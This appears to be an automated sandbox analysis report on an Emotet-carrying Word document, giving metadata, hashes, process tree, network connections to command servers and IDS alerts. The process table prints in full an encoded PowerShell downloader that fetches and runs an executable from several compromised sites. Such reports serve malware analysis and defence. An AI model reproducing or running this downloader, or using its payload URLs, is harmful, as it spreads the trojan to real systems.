download: | ftbdx0b6m8zw_ov8iehren2-19255282988 |
Full analysis: | https://app.any.run/tasks/3add19ed-a50c-4a41-8c2e-6c57924ed98e |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | May 24, 2019, 15:33:38 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Soft, Subject: user-facing, Author: Velda Harvey, Comments: Iowa productivity Buckinghamshire, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri May 24 14:58:00 2019, Last Saved Time/Date: Fri May 24 14:58:00 2019, Number of Pages: 1, Number of Words: 17, Number of Characters: 97, Security: 0 |
MD5: | 1B0564531256DC1431DAC2A7B6C82AE6 |
SHA1: | 985F7B4B3B89F4F6D3DCF83367075FD4420E4715 |
SHA256: | 55C4C3F89A961E9BA055E47B5875B7A945B97AEE146F522C9A9F299DD989137D |
SSDEEP: | 3072:a77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qB+vCmhGTp1plAgIU:a77HUUUUUUUUUUUUUUUUUUUT52V+Nmhi |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserTypeLen: | 32 |
---|---|
CompObjUserType: | Microsoft Word 97-2003 Document |
Title: | Soft |
Subject: | user-facing |
Author: | Velda Harvey |
Keywords: | - |
Comments: | Iowa productivity Buckinghamshire |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:05:24 13:58:00 |
ModifyDate: | 2019:05:24 13:58:00 |
Pages: | 1 |
Words: | 17 |
Characters: | 97 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | Kuhn - Nader |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 113 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
Manager: | Hackett |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1892 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\ftbdx0b6m8zw_ov8iehren2-19255282988.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3496 | powershell -nop -e JABwAEEAVwAzAF8AdwBKAGoAPQAnAEUAWABMAGIAdwB3AG0AJwA7ACQASAA3AFMAdgBVAHAAIAA9ACAAJwA0ADQAMQAnADsAJAB0ADgAdgBGAHIAawBuAFEAPQAnAFgAMwA2AHMAegBTAGMAbgAnADsAJABaAHAAQwBwADgAaQBCAEgAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEgANwBTAHYAVQBwACsAJwAuAGUAeABlACcAOwAkAGEAWAB6AG4AQwBJAD0AJwBHAGgASgA0AEgASQAwADEAJwA7ACQAbQBEAEcAawBGAEYAPQAmACgAJwBuACcAKwAnAGUAdwAtAG8AYgBqACcAKwAnAGUAYwB0ACcAKQAgAE4ARQBgAFQALgBXAGUAYgBgAEMATABpAEUAYABOAHQAOwAkAHEAYgB6AE4ATQB3AHcAPQAnAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBtAGEAaQBzAG8AbgBtAGEAbgBvAHIALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB1AG4AUgBwAEYAWQBDAHcARgBmAC8AQABoAHQAdABwADoALwAvADQAZwBzAHQAYQByAHQAdQBwAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AdwBvAHQAZAByAG4AUABHAC8AQABoAHQAdABwADoALwAvAGIAbwBuAGUAcwBwAGUAYwBpAGEAbABpAHMAdABzAGkAbgBtAGEAbgBnAGEAbABvAHIAZQAuAGMAbwBtAC8AaQBtAGEAZwBlAHMALwBlAGgAYgBpAG0AOQBxAF8AcQBnAHIAZQA1AG0AYwBqAGYAOQAtADYAOQA2ADAAOAAvAEAAaAB0AHQAcAA6AC8ALwBoAG8AbgBkAGEAdABoAHUAZABvAC4AYwBvAG0ALwB3AHAALQBzAG4AYQBwAHMAaABvAHQAcwAvAGMAbgB3AG4AdwBzAHEAaABfADUANQBjADkAcQAtADkAMgA4ADcANAA2AC8AQABoAHQAdABwADoALwAvAGIAZQB0AGEAYgBhAG4AZwBsAGEAZABlAHMAaAAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AMgA0AHQAaABmAHMAdgBvAHkAXwB0AHkAMABpAHgAaABtAC0ANQA5AC8AJwAuAFMAcABsAGkAdAAoACcAQAAnACkAOwAkAEoAWgBKADUAMQBzAD0AJwBZAGQAbQBqAFQAMAAnADsAZgBvAHIAZQBhAGMAaAAoACQAbAB3AGgAMgBpAG0AIABpAG4AIAAkAHEAYgB6AE4ATQB3AHcAKQB7AHQAcgB5AHsAJABtAEQARwBrAEYARgAuAEQAbwB3AG4AbABPAEEARABGAGkAbABFACgAJABsAHcAaAAyAGkAbQAsACAAJABaAHAAQwBwADgAaQBCAEgAKQA7ACQAUABpAEkASQBDAGkAPQAnAEgATgB6AGoAdQB3AHQAXwAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQAnACsAJwB0ACcAKwAnAGUAbQAnACkAIAAkAFoAcABDAHAAOABpAEIASAApAC4ATABlAG4ARwB0AGgAIAAtAGcAZQAgADIAMAA4ADAAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwB0AEEAcgBUACgAJABaAHAAQwBwADgAaQBCAEgAKQA7ACQATgBIAG0AaQBHAHAAegA9ACcARgBsAE8ASwBIADEAMQAnADsAYgByAGUAYQBrADsAJABGAE8AbgA0AFAAdgBtADUAPQAnAGoAdgBuAGkASABoAGYAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAdwBDAGQATgA1ADkAegBoAD0AJwBXADYAOABPAFIANwA4ACcA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3716 | "C:\Users\admin\441.exe" | C:\Users\admin\441.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3632 | --9eb38daf | C:\Users\admin\441.exe | 441.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2496 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | 441.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3084 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | soundser.exe | |
User: admin Integrity Level: MEDIUM |
PID | Process | Filename | Type | |
---|---|---|---|---|
1892 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR3F10.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3496 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\10MMQJHJRAHX08VNOMF6.temp | — | |
MD5:— | SHA256:— | |||
3496 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF | SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 | |||
3496 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF13498f.TMP | binary | |
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF | SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 | |||
1892 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E369C700.wmf | wmf | |
MD5:95B5BED7F2DADDF367D636778CE3C9E5 | SHA256:90325BBA44EEACA0DDB89CE8E0792505CD7EE37A788AF61B9D4080E8D7006ECD | |||
1892 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$bdx0b6m8zw_ov8iehren2-19255282988.doc | pgc | |
MD5:BF24163AD7D27E6807BDA5C63868E2EA | SHA256:87394A018B7F8F00726A8B6AAB8B598A0A09DDE1B7CD53F5E62E0C93A8F41F3B | |||
1892 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7DEDCA3B.wmf | wmf | |
MD5:2C9FA1640E963E2F51520F2A5A347143 | SHA256:98F2D0F7432284594AFA6F16872A7E7531FC38D0D2062479CE5B88C73FD68C06 | |||
1892 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:FC364354350804BC97FCC9AEF07F32AD | SHA256:92F1088DD2889EF5A10207CF69EE4CBB09EE8339CF991F0014322B6A82C5C463 | |||
1892 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:1813D950DF33ACD64BA9559D9C9BA2AE | SHA256:554771EA8C23FE39F12CC2B4913D86DFB50B3A2132BDC6F2862E4BE7B8906EF3 | |||
1892 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A19519E5.wmf | wmf | |
MD5:4D84320DB112C7A82D1DE1FAC8092603 | SHA256:1D7DACC0608C2A08BC9559D34E5C1A508260376F425B1877EA3459B25BF9DB95 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3084 | soundser.exe | POST | — | 5.67.205.99:80 | http://5.67.205.99/enabled/ | GB | — | — | malicious |
3084 | soundser.exe | POST | — | 144.139.247.220:80 | http://144.139.247.220/odbc/merge/ | AU | — | — | malicious |
3084 | soundser.exe | POST | — | 76.86.20.103:80 | http://76.86.20.103/raster/json/ringin/ | US | — | — | malicious |
3496 | powershell.exe | GET | 200 | 138.197.32.141:80 | http://www.maisonmanor.com/wp-content/unRpFYCwFf/ | US | executable | 74.0 Kb | suspicious |
3084 | soundser.exe | POST | 200 | 104.236.99.225:8080 | http://104.236.99.225:8080/odbc/ | US | binary | 148 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3084 | soundser.exe | 5.67.205.99:80 | — | Sky UK Limited | GB | malicious |
3084 | soundser.exe | 76.86.20.103:80 | — | Time Warner Cable Internet LLC | US | malicious |
3496 | powershell.exe | 138.197.32.141:80 | www.maisonmanor.com | Digital Ocean, Inc. | US | suspicious |
3084 | soundser.exe | 144.139.247.220:80 | — | Telstra Pty Ltd | AU | malicious |
3084 | soundser.exe | 39.61.34.254:7080 | — | Pakistan Telecom Company Limited | PK | malicious |
3084 | soundser.exe | 201.97.95.50:22 | — | Uninet S.A. de C.V. | MX | malicious |
— | — | 104.236.99.225:8080 | — | Digital Ocean, Inc. | US | malicious |
Domain | IP | Reputation |
---|---|---|
www.maisonmanor.com |
| suspicious |
dns.msftncsi.com |
| shared |
PID | Process | Class | Message |
---|---|---|---|
3496 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3496 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3496 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3084 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3084 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3084 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |